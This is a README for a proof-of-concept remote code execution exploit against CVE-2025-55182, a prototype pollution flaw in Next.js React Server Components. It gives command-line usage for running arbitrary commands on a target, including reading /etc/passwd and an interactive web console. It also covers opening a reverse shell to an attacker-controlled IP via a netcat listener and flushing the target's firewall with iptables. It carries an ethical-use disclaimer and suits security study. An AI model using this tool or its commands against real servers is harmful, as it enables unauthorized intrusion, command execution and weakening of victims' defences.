REACT2SHELL

🎯 Quick Overview (What is this?)

This tool is a simple Proof-of-Concept (PoC) exploit for CVE-2025-55182. This is a serious flaw (Prototype Pollution) found in Next.js applications that use React Server Components.

If a target server is vulnerable, this script lets you run operating system commands on it (Remote Code Execution, or RCE).

This tool is built for learning, CTFs, and responsible security research.

⚠️ Disclaimer for Students & CTF Players

USE ETHICALLY. Only run this exploit against systems you own or have explicit, documented permission to test. Unauthorized use is illegal. This tool is for educational purposes only.

🌟 How to Use It

This tool has three main ways to run commands: a simple single command, a full interactive web console, and an attempt at a classic reverse shell.

⚙️ Installation

1. Get the code:

   git clone https://github.com/raivenLockdown/RCE_React2Shell_ButCooler-SomeUselessUsefulThingsLMAO-.git
   cd REACT2SHELL

2. Install the library:

   pip install requests

Mode 1: Interactive Web Console (Recommended for CTFs)

This is the easiest way to interact with the target. It starts a local web page on your machine that acts like a terminal.

1. Run the script:

   python3 exploit.py <TARGET_URL> --web-cli

   Example: python3 exploit.py http://target.com/ --web-cli

2. Open your browser: The script will tell you to open http://127.0.0.1:8000/. You can then type commands (like ls, whoami, cat /etc/passwd) directly into the web page.

Mode 2: Single Command Execution

Run one command and get the output immediately in your local terminal. Good for quick checks like finding your user ID.

python3 exploit.py <TARGET_URL> --cmd '<COMMAND>'

Example: python3 exploit.py http://target.com/ --cmd 'id'

Mode 3: Reverse Shell Attempt

Use this mode if you want a stable, persistent connection. Note: This often fails in real-world environments due to firewalls (egress filtering).

1. Start your listener (e.g., netcat):

   nc -lvnp 55555

2. Run the exploit:

   python3 exploit.py <TARGET_URL> -i <YOUR_IP> -p 55555 [--flush]

   • -i <YOUR_IP>: Your machine's IP.
   • -p 55555: The port your listener is using.
   • --flush (Optional): Tries to run iptables -F on the target first to clear host firewalls.

---

🔬 Technical Explanation (How the Exploit Works)

The exploit uses a Prototype Pollution flaw to achieve RCE.

1. Prototype Pollution: The script sends a specially crafted payload to a vulnerable Next.js endpoint. This payload exploits a flaw in how the server processes data, allowing us to add properties to the basic JavaScript object structure (Object.prototype).
2. RCE Trigger: We pollute a specific, internal property that controls what code the server runs (using Node.js's child_process). We replace that property's value with our shell command.
3. Output Capture: When running commands in the single-command or web CLI modes, the exploit makes the server execute the command (execSync) and immediately throw a harmless error. The output of the command is cleverly stuffed into the error message's digest field. The Python script then reads this field to get the results.

🤝 References and Credits

This research relies on the initial work and disclosure by the security community. Thank you to all researchers and open-source contributors.

📚 Key References

• Original PoC Repository for CVE-2025-55182 - (The foundation for this exploit.)
• Original PoC Code Example - (The initial code example.)
• Critical Security Vulnerability in React Server Components - (Official React blog post on the issue.)
• Critical Vulnerability in React (CVE-2025-55182) - (Detailed security analysis.)
• React Server Functions Documentation - (Official docs explaining the context of how the vulnerable components work.)